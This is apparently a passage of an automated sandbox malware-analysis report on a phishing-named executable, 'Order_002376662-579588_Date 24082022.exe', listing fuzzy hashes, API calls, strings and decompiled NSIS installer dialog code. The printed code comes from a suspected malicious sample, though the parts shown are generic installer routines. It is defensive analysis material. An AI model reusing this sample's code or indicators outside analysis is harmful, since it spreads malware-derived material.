Instruction Fuzzy Hash: 67D1967570434A8FDB30DE388C947DA77B2BF9A350F84462ADD89DB260E3318A468B41

Uniqueness

Uniqueness Score: -1.00%

Function 03514ADD Relevance: 1.5, APIs: 1, Instructions: 43nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,03515704,069A5492,00000000,?,?,?,?,0351116D,03502A5E), ref: 03514C35

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e1ecf6f0955d3b47315653e2959c9417e77645a4ab85c5fc7eda3c5101a1645c
Instruction ID: 58bd0c671086d5071b196449ea9acab3d6d598d49780b0172ee319d45443b8a0
Opcode Fuzzy Hash: e1ecf6f0955d3b47315653e2959c9417e77645a4ab85c5fc7eda3c5101a1645c
Instruction Fuzzy Hash: CE01D6B4504246CFEF24DE76A9943EA37B1BFD8305F519936CC468B724C73099558A01

Uniqueness

Uniqueness Score: -1.00%

Function 035066A3 Relevance: 1.5, Strings: 1, Instructions: 289COMMON

Download Yara Rule

Strings

f([E, xrefs: 0350694E

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: f([E
API String ID: 0-1454264603
Opcode ID: 9f5c4ae012619cf5f6cd49de4e7764a4a47ca0adc766c5ec03664a8d9cc3c858
Instruction ID: 0d1b5827b97756ca600b8ca13cf9ba32a74cacc4187734f204c7951132e57e02
Opcode Fuzzy Hash: 9f5c4ae012619cf5f6cd49de4e7764a4a47ca0adc766c5ec03664a8d9cc3c858
Instruction Fuzzy Hash: 3DA112756043899FEB34DE288C957EA77B6FF99350F45452EEC899B260D3308A81CB02

Uniqueness

Uniqueness Score: -1.00%

Function 03510E99 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

h, xrefs: 0350397B

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: b50fbe5e82127e7c1388719f0e1885333b7d3b1b8d56e3f2391c3fec68280c9a
Instruction ID: ac0b0db14bf733f38111b4bb63cb81ed2e7a07dbec91909ad22a64006fb6b6fa
Opcode Fuzzy Hash: b50fbe5e82127e7c1388719f0e1885333b7d3b1b8d56e3f2391c3fec68280c9a
Instruction Fuzzy Hash: 50717679614349CBDB30DF3888957DA7BF2BF5A650F540969DC88DB260E332CA4ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 03512F2F Relevance: .8, Instructions: 755COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400818ffe38bbbfeb7948e8e70415430272f904999c05c50a9dd4d8cdbf7fc96
Instruction ID: df451e7e90af26bb7f0c9d3b42abcdcd39099fc1b18fc5dcf33d7dd1c22a2039
Opcode Fuzzy Hash: 400818ffe38bbbfeb7948e8e70415430272f904999c05c50a9dd4d8cdbf7fc96
Instruction Fuzzy Hash: 116219356083858FEB35DF38D9A47DA7BE1AF52350F4981AECC998F296D3308545CB12

Uniqueness

Uniqueness Score: -1.00%

Function 03510A8C Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.23342945270.0000000003500000.00000040.00001000.00020000.00000000.sdmp, Offset: 03500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3500000_Order_002376662-579588_Date 24082022.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf14ddf02a754854d0dc9bf4b8495b6eae74b909197d1796badf3faec0c27c27
Instruction ID: 2be2413521a1ca09e4514636be66dbcfcbb78cdac34e2da15b56c56e21e5efd2
Opcode Fuzzy Hash: cf14ddf02a754854d0dc9bf4b8495b6eae74b909197d1796badf3faec0c27c27
Instruction Fuzzy Hash: FA712F75A0034A9FEB34DE38CD94BDA73B6FF99750F45452EDC898B290E7309A818B01

Uniqueness

Uniqueness Score: -1.00%

Function 00403C86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403C86(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d18 = _t35;
					if(_t116 == 0x110) {
						 *0x424728 = _t126;
						 *0x420d2c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fcf8 = _t92;
						E0040415A(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f08);
						 *0x423eec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d18 = 1;
					}
					_t123 =  *0x40a1f8; // 0x0
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424760;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004041A6(0x40b);
						while(1) {
							_t37 =  *0x420d18; // 0x1
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0x0
							__eflags = _t39 -  *0x424764;
							if(_t39 ==  *0x424764) {
								E0040140B(1);
							}
							__eflags =  *0x423eec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424764; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004060BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E0040415A(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E0040415A(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E0040415A(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247cc - _t134;
							_v32 = _t49;
							if( *0x4247cc != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
							E0040417C(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fcf8, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247cc - _t134;
							if( *0x4247cc == _t134) {
								_push( *0x420d2c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fcf8);
							}
							E0040418F();
							E00406099(0x420d30, E00403C67());
							E004060BB(0x420d30, _t126, _t131,  &(0x420d30[lstrlenA(0x420d30)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d30); // executed
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423ef8); // executed
									 *0x420508 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424720,  *_t131 +  *0x423f00 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t74 - _t134;
									 *0x423ef8 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E0040415A(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423ef8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x423eec - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423ef8, 8); // executed
									E004041A6(0x405);
									goto L58;
								}
								__eflags =  *0x4247cc - _t134;
								if( *0x4247cc != _t134) {
									goto L61;
								}
								__eflags =  *0x4247c0 - _t134;
								if( *0x4247c0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423ef8);
						 *0x424728 = _t134;
						EndDialog(_t126,  *0x420100);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423ef8, 0x40f, 0, 1);
						__eflags =  *0x423eec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d10, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d10,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E004041C1(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423ef8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247cc - _t134;
										if( *0x4247cc == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420100 = 1;
											L21:
											_push(0x78);
											L22:
											E00404133();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420100 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423ef8);
						 *0x423ef8 = _a12;
						L58:
						if( *0x421d30 == _t134) {
							_t143 =  *0x423ef8 - _t134; // 0x10410
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa); // executed
								 *0x421d30 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403c8f
0x00403c98
0x00403dd9
0x00403ddd
0x00403de1
0x00403de3
0x00403de8
0x00403df3
0x00403dfe
0x00403e03
0x00403e05
0x00403e07
0x00403e0a
0x00403e0f
0x00403e1d
0x00403e2a
0x00403e31
0x00403e31
0x00403e32
0x00403e32
0x00403e37
0x00403e3d
0x00403e44
0x00403e4a
0x00403e4c
0x00403e8c
0x00403e91
0x00403e96
0x00403e96
0x00403e9b
0x00403ea4
0x00403ea6
0x00403eab
0x00403eb1
0x00403eb5
0x00403eb5
0x00403eba
0x00403ec0
0x00000000
0x00000000
0x00403ecb
0x00403ed1
0x00000000
0x00000000
0x00403eda
0x00403ee2
0x00403ee7
0x00403eea
0x00403ef0
0x00403ef5
0x00403ef8
0x00403efe
0x00403f03
0x00403f06
0x00403f0c
0x00403f14
0x00403f1a
0x00403f20
0x00403f24
0x00403f2b
0x00403f2b
0x00403f2b
0x00403f35
0x00403f47
0x00403f53
0x00403f58
0x00403f62
0x00403f68
0x00403f6a
0x00403f6f
0x00403f6c
0x00403f6c
0x00403f6c
0x00403f7f
0x00403f97
0x00403f99
0x00403f9f
0x00403fb4
0x00403fa1
0x00403faa
0x00403fac
0x00403fac
0x00403fba
0x00403fcb
0x00403fdc
0x00403fe3
0x00403fe9
0x00403fed
0x00403ff2
0x00403ff4
0x00000000
0x00403ffa
0x00403ffa
0x00403ffc
0x00000000
0x00000000
0x00404002
0x00404006
0x0040402b
0x00404031
0x00404037
0x00404039
0x00000000
0x00000000
0x0040405f
0x00404065
0x00404067
0x0040406c
0x00000000
0x00000000
0x00404072
0x00404075
0x00404078
0x0040408f
0x0040409b
0x004040b4
0x004040ba
0x004040be
0x004040c3
0x004040c9
0x00000000
0x00000000
0x004040d3
0x004040de
0x00000000
0x004040de
0x00404008
0x0040400e
0x00000000
0x00000000
0x00404014
0x0040401a
0x00000000
0x00000000
0x00000000
0x00404020
0x00403ff4
0x004040eb
0x004040f7
0x004040fe
0x00000000
0x00403e4e
0x00403e4e
0x00403e51
0x00403e84
0x00403e84
0x00403e86
0x00000000
0x00000000
0x00000000
0x00403e86
0x00403e53
0x00403e57
0x00403e5c
0x00403e5e
0x00000000
0x00000000
0x00403e6e
0x00403e76
0x00000000
0x00403e7c
0x00403caa
0x00403caa
0x00403cae
0x00403cb3
0x00403cc2
0x00403cc2
0x00403ccb
0x00403cd4
0x00403cdf
0x00403cdf
0x00403ceb
0x00403d07
0x00403d0a
0x00403d1d
0x00403d23
0x00403dc6
0x00000000
0x00403dcf
0x00403d29
0x00403d36
0x00403d38
0x00403d3a
0x00403d59
0x00403d59
0x00403d5c
0x00403d61
0x00403d64
0x00403d74
0x00403d75
0x00403d77
0x00403dad
0x00403dc0
0x00000000
0x00403dc0
0x00403d79
0x00403d7f
0x00403d98
0x00403d9d
0x00403d9f
0x00000000
0x00000000
0x00403da1
0x00403d8d
0x00403d8d
0x00403d8f
0x00403d8f
0x00000000
0x00403d8f
0x00403d82
0x00403d87
0x00000000
0x00403d87
0x00403d66
0x00403d6c
0x00000000
0x00000000
0x00403d6e
0x00000000
0x00403d6e
0x00403d5e
0x00000000
0x00403d5e
0x00403d44
0x00403d4b
0x00403d51
0x00403d53
0x00000000
0x00000000
0x00000000
0x00403d53
0x00403d0f
0x00000000
0x00403ced
0x00403cf3
0x00403cfd
0x00404104
0x0040410a
0x0040410c
0x00404112
0x00404117
0x0040411d
0x0040411d
0x00404112
0x00404127
0x00000000
0x00404127
0x00403ceb

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC2
ShowWindow.USER32(?), ref: 00403CDF
DestroyWindow.USER32 ref: 00403CF3
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0F
GetDlgItem.USER32(?,?), ref: 00403D30
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D44
IsWindowEnabled.USER32(00000000), ref: 00403D4B
GetDlgItem.USER32(?,00000001), ref: 00403DF9
GetDlgItem.USER32(?,00000002), ref: 00403E03
SetClassLongA.USER32(?,000000F2,?), ref: 00403E1D
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E6E
GetDlgItem.USER32(?,00000003), ref: 00403F14
ShowWindow.USER32(00000000,?), ref: 00403F35
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F47
EnableWindow.USER32(?,?), ref: 00403F62
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F78
EnableMenuItem.USER32(00000000), ref: 00403F7F
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403F97
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FAA
lstrlenA.KERNEL32(Borerig Setup: Installing,?,Borerig Setup: Installing,00000000), ref: 00403FD4
SetWindowTextA.USER32(?,Borerig Setup: Installing), ref: 00403FE3
ShowWindow.USER32(?,0000000A), ref: 00404117

Strings

Borerig Setup: Installing, xrefs: 00403FC4, 00403FCA, 00403FD3, 00403FE1

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Borerig Setup: Installing
API String ID: 3282139019-1266718173
Opcode ID: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
Instruction ID: afa02c3f8619f32611db6353159f3c7bef7a20c9a9555f4ee95b1447c660ea49
Opcode Fuzzy Hash: 52da23376c786621b01899b05758cefab0ff852f565aac078f1ff0427d2d89b0
Instruction Fuzzy Hash: 6FC11271600201FBDB206F61EE89D2B3AB8FB94306F51053EF661B51F0CB7998829B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004038E9 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004038E9(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424734;
				_t17 = E00406431(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d30;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E00405F80(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d30, 0);
					__eflags =  *0x420d30; // 0x42
					if(__eflags == 0) {
						E00405F80(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x420d30, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405FF7("1033",  *_t17() & 0x0000ffff);
				}
				E00403BAE(_t71, _t84);
				_t80 = "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne";
				 *0x4247c0 =  *0x42473c & 0x00000020;
				 *0x4247dc = 0x10000;
				if(E00405B1F(_t84, "C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Sigtelinjens\\Tvtningerne") != 0) {
					L16:
					if(E00405B1F(_t92, _t80) == 0) {
						E004060BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x424720, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423f08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403BAE(_t71, __eflags);
							__eflags =  *0x4247e0;
							if( *0x4247e0 != 0) {
								_t28 = E00405292(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423eec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d10, 5); // executed
							_t34 = E004063C3("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004063C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ec0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423ec0);
								 *0x423ee4 = _t81;
								RegisterClassA(0x423ec0);
							}
							_t36 =  *0x423f00; // 0x0
							_t39 = DialogBoxParamA( *0x424720, _t36 + 0x00000069 & 0x0000ffff, 0, E00403C86, 0); // executed
							E00403839(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424720;
						 *0x423ec4 = E00401000;
						 *0x423ed0 =  *0x424720;
						 *0x423ed4 = _t25;
						 *0x423ee4 = 0x40a210;
						if(RegisterClassA(0x423ec0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d10 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424720, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236c0;
					E00405F80(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424778, 0x4236c0, 0);
					_t57 =  *0x4236c0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236c1;
						 *((char*)(E00405A5C(0x4236c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406099(_t80, E00405A31(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405A78(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x004038ef
0x004038f8
0x004038ff
0x00403901
0x00403915
0x00403927
0x0040392e
0x00403935
0x0040393b
0x00403940
0x00403946
0x00403959
0x00403959
0x00403964
0x00403903
0x0040390e
0x0040390e
0x00403969
0x00403973
0x0040397c
0x00403981
0x00403992
0x00403a19
0x00403a21
0x00403a2a
0x00403a2a
0x00403a40
0x00403a46
0x00403a54
0x00403ad5
0x00403add
0x00403ae7
0x00403aec
0x00403af2
0x00403b7c
0x00403b81
0x00403b83
0x00403b9f
0x00000000
0x00403b9f
0x00403b85
0x00403b8b
0x00403b93
0x00403b93
0x00000000
0x00403b8b
0x00403b00
0x00403b0b
0x00403b10
0x00403b12
0x00403b19
0x00403b19
0x00403b24
0x00403b2c
0x00403b2e
0x00403b30
0x00403b39
0x00403b3c
0x00403b42
0x00403b42
0x00403b48
0x00403b61
0x00403b72
0x00000000
0x00403b77
0x00403adf
0x00403ae1
0x00000000
0x00403a56
0x00403a56
0x00403a62
0x00403a6c
0x00403a72
0x00403a77
0x00403a86
0x00403ba4
0x00403ba4
0x00000000
0x00403ba4
0x00403a95
0x00403ad0
0x00000000
0x00403ad0
0x00403998
0x00403998
0x0040399b
0x0040399d
0x00000000
0x00000000
0x004039a7
0x004039b7
0x004039bc
0x004039c3
0x00000000
0x00000000
0x004039c7
0x004039c9
0x004039d6
0x004039d6
0x004039de
0x004039e4
0x00403a0c
0x00403a14
0x00000000
0x004039f6
0x004039f7
0x00403a00
0x00403a06
0x00403a07
0x00000000
0x00403a07
0x00403a02
0x00403a04
0x00000000
0x00000000
0x00000000
0x00403a04
0x004039e4

APIs

Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E

lstrcatA.KERNEL32(1033,Borerig Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Borerig Setup: Installing,00000000,00000002,77313410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" ,00000000), ref: 00403964
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne,1033,Borerig Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Borerig Setup: Installing,00000000,00000002,77313410), ref: 004039D9
lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
GetFileAttributesA.KERNEL32(Call), ref: 004039F7
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne), ref: 00403A40

Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004

RegisterClassA.USER32(00423EC0), ref: 00403A7D
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
ShowWindow.USER32(00000005,00000000), ref: 00403B00
GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
RegisterClassA.USER32(00423EC0), ref: 00403B42
DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61

Strings

RichEdit, xrefs: 00403B33
RichEd32, xrefs: 00403B14
RichEdit20A, xrefs: 00403B24, 00403B2A
Borerig Setup: Installing, xrefs: 00403915, 0040391B, 00403940, 00403949, 0040395E
RichEd20, xrefs: 00403B06
Control Panel\Desktop\ResourceLocale, xrefs: 0040391D
.DEFAULT\Control Panel\International, xrefs: 0040394F
Call, xrefs: 004039A7, 004039AF, 004039BC, 00403A06, 00403A0C
"C:\Users\user\Desktop\Order_002376662-579588_Date 24082022.exe" , xrefs: 004038ED
_Nb, xrefs: 00403A5C, 00403AC4
1033, xrefs: 00403909, 0040395F
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Sigtelinjens\Tvtningerne, xrefs: 00403973, 0040397B, 00403A13, 00403A19, 00403A29
.exe, xrefs: 004039E6
C:\Users\user\AppData\Local\Temp\, xrefs: 004038EE

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
